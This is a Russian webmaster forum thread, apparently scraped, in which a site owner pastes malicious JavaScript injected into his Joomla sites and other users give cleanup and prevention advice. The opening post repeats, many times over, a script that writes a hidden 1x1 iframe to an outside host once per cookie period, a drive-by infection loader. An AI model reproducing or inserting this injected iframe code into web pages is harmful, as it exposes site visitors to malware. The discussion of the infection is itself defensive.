var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )[/size]
... (тут еще много - не помещается)
|
Как наказать пидаров и как вылечить сайт?
Спасибо!
(возможно ли, что это ломанули сервак - т.к. все сайты на Джумла заражены сплоитом, а сайты на ВП - чистые?) |
|
|
|
|
|
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
-- |
Yabuti V.I.P. |
Зарегистрирован: 28.11.2008
Сообщений: 16263
|
Обратиться по нику
|
Yabuti |
Ответить с цитатой | | |
|
Сейчас отписал в саппорт хостинга, пусть у себя тоже проверят сервер:
Цитата: |
Здравствуйте!
У меня (заметил только сейчас) ломанули все сайты на движке Joomla - а на WordPress - чистые.
Может ли быть так, что ломанули сервер или это увели только мой FTP-акк?
Несколько зараженных сайтов (там сплоит!!!):
kyn.kz
jc-catering.com
Подскажите пожалуйста, я первый раз сталкиваюсь со взломом - хорошо антивирус заорал (avast! home edition), а то бы подхватил заразу.
Спасибо
|
|
|
|
|
|
|
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
-- |
Yabuti V.I.P. |
Зарегистрирован: 28.11.2008
Сообщений: 16263
|
Обратиться по нику
|
Yabuti |
Ответить с цитатой | | |
|
Блин, и админка зараженного сайта тоже хочет заразить - вот такая фигня:
Как такое можно вылечить, подскажите пожалуйста!!! |
|
|
|
|
|
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
-- |
adamant V.I.P. |
Зарегистрирован: 20.03.2008
Сообщений: 11494
|
Обратиться по нику
|
adamant |
Ответить с цитатой | | |
|
смотри где прописан и удаляй. стучи к сапорту в аську пусть почитстит у себя |
|
|
|
|
|
EvaPharmacy. Чтобы мазать хлеб икоркой, Ева – лучшая партнёрка! Инвайты Jabber: evasupport@jabber.org и ICQ: 750000
Unlimited on 1Gbs port | |
zeoman V.I.P. |
Зарегистрирован: 19.03.2008
Сообщений: 3708
|
Обратиться по нику
|
zeoman |
Ответить с цитатой | | |
|
Yabuti, поменять все пароли и написать разработчикам cms и хостингу. Ловить, как мне кажется, бесполезно. Такое обычно на автомате массово делается, т.е. ты просто попал в список. Ничего личного тут нет. |
|
|
|
|
|
|
Seovin + + + + Banned |
Зарегистрирован: 04.02.2010
Сообщений: 202
|
Обратиться по нику
|
Seovin + + + + |
Ответить с цитатой | | |
|
Я бы сделал так - закачиваешь все файлы на комп. - запускаешь Dreamweaver или что другое, находишь кусок кода, который хочешь удалить и делаешь автоматическую замену по всему сайту. Потом сайт выгружаешь обратно. Займет минут 15.
З.Ы.
У меня тоже недавно Джумлу ломанули, но аккуратнее. |
|
|
|
|
|
|
Sunlight солнечный свет |
Зарегистрирован: 08.02.2008
Сообщений: 770
|
Обратиться по нику
|
Sunlight |
Ответить с цитатой | | |
|
проверь еще компьютер на вирусы. у меня было подобное, подхватил троян который утащил пароли от ftp. после этого я уяснил для себя следующее
не пользоваться cuteftp, и вообще не хранить пароли в фтп менеджере, а вводить их вручную при каждом конекте. юзать лицензионный антивирус.
регулярно делать бекапы. тогда мне более менее повезло. только кучу времени потратил ну и нервов.
отключай зараженные сайты. можно получить санкции с поисковиков. |
|
|
|
|
|
[url]telefony-putan.ru[/url] |
Yabuti V.I.P. |
Зарегистрирован: 28.11.2008
Сообщений: 16263
|
Обратиться по нику
|
Yabuti |
Ответить с цитатой | | |
|
зараженные сайты снес вообще (залил в спец-подпапку, когда удет время - разберусь).
Перенесу материалы на WordPress, ну ее нафиг, дырявую Джумлу
пароли ввожу всегда вручную, но, видимо, какой-то хитрый троян попался |
|
|
|
|
|
Ксен ВПС и выделенные серверы от PQCService.net с бесплатным администрированием в 7 локациях, icq: 87244588
-- |
Seovin + + + + Banned |
Зарегистрирован: 04.02.2010
Сообщений: 202
|
Обратиться по нику
|
Seovin + + + + |
Ответить с цитатой | | |
|
Чисто из своего опыта:
Не пользуйтесь FTP, пользуйтесь SSH
Делайте недельные бэкапы.
Нет в природе недырявого движка. Ломают все, даже Пентагон.
Если вас взломали - не обижайтесь, ничего личного, просто Вы попали в поток. |
|
|
|
|
|
|
Tomas-R + + V.I.P. |
Зарегистрирован: 07.01.2008
Сообщений: 5567
|
Обратиться по нику
|
Tomas-R + + |
Ответить с цитатой | | |
|
Seovin писал(а): |
Чисто из своего опыта:
Не пользуйтесь FTP, пользуйтесь SSH
Делайте недельные бэкапы.
Нет в природе недырявого движка. Ломают все, даже Пентагон.
Если вас взломали - не обижайтесь, ничего личного, просто Вы попали в поток.
|
Подскажи команды для ssh
залить на хост
слить с хоста
спасибо |
|
|
|
|
|
рекламная подпись (в PM) |
awa Опытный |
Зарегистрирован: 13.10.2008
Сообщений: 269
|
Обратиться по нику
|
|
|
Адалт дизайн Yellow Cat Style |
mescalito Свой |
Зарегистрирован: 05.09.2006
Сообщений: 97
|
Обратиться по нику
|
|
|
|
Seovin + + + + Banned |
Зарегистрирован: 04.02.2010
Сообщений: 202
|
Обратиться по нику
|
|
|
|
|
|
Партнеры
|